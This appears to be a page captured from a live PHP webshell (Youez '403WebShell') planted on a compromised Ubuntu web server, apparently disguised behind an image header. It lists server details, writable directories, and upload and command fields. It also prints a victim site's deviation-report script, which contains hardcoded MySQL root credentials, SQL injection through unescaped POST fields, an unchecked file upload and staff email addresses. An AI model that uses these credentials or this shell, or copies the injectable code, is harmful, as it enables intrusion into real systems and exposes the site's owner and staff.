????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.222.153.166
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/deviation/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/deviation/save_report.php
 <?php
 		session_start();
	
		$link = mysql_connect ("localhost", "root", "root123");
		mysql_select_db ("vpa");
	
	    $LogDate = date("Y-m-d H:i:s");  
        $oldsolution = $_POST['oldsolution'];
		$addedby = $_POST['addedby'];
		$person = $_POST['person'];
		$addedby2 = $_POST['addedby2'];
		$type = $_POST['type'];
		$process = $_POST['process'];
		$critical = $_POST['critical'];

		$description = nl2br($_POST['description']);
		$action = nl2br($_POST['action']);
		
		if($addedby2 == "NULL"){
			$addedby2 = "";
		}
		
		$report = $_POST['report'];
		if($report == "on"){
			$report = 1;
		} else{
			$report = 0;
		}
	
		$CustomerId = $_POST['type_Extra'];
	 
		$sql = "INSERT INTO DeviationReport VALUES(null,'$addedby ','$person','$addedby2','$LogDate','$type','$process','$description','$action','','$report','0','0','$CustomerId','$critical','','$oldsolution','0','',0)";

 		$result = mysql_query($sql);
		
		$lastId = mysql_insert_id();
		
		if($_FILES["photo"]["name"] != ""){
				$target_dir = "photos/";
				$target_file = $target_dir . $lastId.".jpg";
				move_uploaded_file($_FILES["photo"]["tmp_name"], $target_file);
				$sql = "UPDATE DeviationReport SET photo = '$target_file' where DeviationReportId = $lastId"; 
				$result = mysql_query($sql);
		}

				$headers  = 'MIME-Version: 1.0' . "\r\n";
				$headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; 
				$headers .= "Date: ".date("r")."\r\n";
				$headers .= "From: astacusproject@gmail.com \r\n";
				$headers .= "Reply-To: astacusproject@gmail.com \r\n";
				$headers .= "Return-Path: astacusproject@gmail.com \r\n";
				
				mail("carl.hoffstedt@astacus.se", "New deviation to handle", "Hej, En ny avvikelse har rapporterats!", $headers);

                if($oldsolution != "NULL"){
                    mail("carl.hoffstedt@astacus.se", "Old solution us choosed!", "Hej, Kontrollera om en ny avvikelse med handlingsplan ska uppdateras", $headers);
                }

		header("Location: index.php?message=Thank you, your deviation was reported!");
?>

Youez - 2016 - github.com/yon3zu
LinuXploit